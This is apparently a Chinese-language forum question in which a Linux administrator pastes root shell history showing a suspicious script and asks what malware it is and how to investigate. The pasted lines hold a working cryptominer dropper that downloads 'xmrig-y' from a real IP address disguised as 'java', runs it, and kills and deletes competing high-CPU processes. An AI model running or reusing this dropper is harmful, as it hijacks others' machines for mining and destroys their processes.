linux系统中发现一些异常的脚本,求教会是什么木马病毒么,该怎么去查?
985 [2018-01-03 14:25:08][root][192.168.202.104] history
986 [2018-01-03 14:25:26][root][192.168.202.104] exit
987 ??sPid=$$
988 [2018-01-03 15:44:52][root][192.168.202.104] mPid=''
989 [2018-01-03 15:44:52][root][192.168.202.104] mName='java'
990 [2018-01-03 15:44:52][root][192.168.202.104] checkCmd() { command -v $1 >/dev/null 2>&1; }
991 [2018-01-03 15:44:52][root][192.168.202.104] downloader () { if checkCmd wget; then wget $1 -O $2 ; elif checkCmd curl; then curl $1 -o $2; elif checkCmd python; then if [ "`python -c "import sys; print(sys.version_info[0])"`" = "3" ]; then python -c "from urllib.request import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; else python -c "from urllib import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; fi; else cat < /dev/tcp/165.227.215.25/5555 > $2; fi; chmod +x $2; }
992 [2018-01-03 15:44:52][root][192.168.202.104] killer() { for tmpVar in `ps -aeo pid,%cpu,command | sed 1d | sort -k 2 | tail -n 10 | awk '{print $1}'`; do if [ $tmpVar = $sPid ]; then continue; fi; if [ $tmpVar = $mPid ]; then continue; fi; if [ `ps -o %cpu $tmpVar | sed 1d | sed 's/\..*//g'` -ge 60 ]; then if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep java` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep sh` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep bash` ]; then continue; fi; kill -9 $tmpVar; rm -f `ls -l /proc/$tmpVar/exe 2>&1 | sed 's/.*-> //g'`; fi; done; }
993 [2018-01-03 15:44:52][root][192.168.202.104] runer() { if [ -z "$mPid" ]; then if [ ! -f $mName ]; then downloader http://165.227.215.25/xmrig-y $mName; fi; chmod +x ./$mName; ./$mName; fi; mPid=`ps -eo pid,command | grep $mName | head -n 1 | awk '{print $1}'`; }
994 [2018-01-03 15:44:52][root][192.168.202.104] pkill python; pkill $mName
995 [2018-01-03 15:44:52][root][192.168.202.104] downloader http://165.227.215.25/xmrig-y $mName
996 [2018-01-03 14:26:01][root][192.168.202.104] history
997 [2018-01-03 14:47:22][root][192.168.202.104] crondtab -l
998 [2018-01-03 15:05:24][root][192.168.202.104] top
999 [2018-01-03 15:29:39][root][192.168.202.104] who
1000 [2018-01-03 15:34:20][root][192.168.202.104] exit